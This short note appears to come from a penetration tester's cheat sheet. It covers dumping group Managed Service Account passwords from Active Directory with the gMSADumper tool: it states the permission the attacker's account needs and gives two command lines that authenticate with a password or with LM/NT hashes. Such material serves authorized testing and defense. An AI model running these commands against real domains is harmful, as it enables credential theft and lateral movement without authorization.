https://github.com/micahvandeusen/gMSADumper
Attacker user needs be listed in the property PrincipalsAllowedToRetrieveManagedPassword of target account.
python3 gMSADumper.py -u <user> -p <password> -d <domain>
python3 gMSADumper.py -u <user> -p <lmHash:ntHash> -d <domain> -l <rhost>